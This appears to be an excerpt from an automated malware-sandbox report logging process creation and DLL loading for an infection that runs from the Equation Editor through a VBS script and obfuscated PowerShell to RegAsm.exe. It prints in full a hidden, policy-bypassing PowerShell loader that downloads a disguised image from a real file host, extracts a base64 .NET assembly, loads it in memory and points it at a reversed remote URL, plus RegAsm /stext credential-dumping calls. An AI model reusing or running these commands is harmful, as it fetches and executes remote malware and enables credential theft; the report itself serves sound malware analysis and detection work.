? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\pcgrqdsjmlcrsdy"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zeljrwdcztuwukmaun"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\pcgrqdsjmlcrsdy"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zeljrwdcztuwukmaun"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
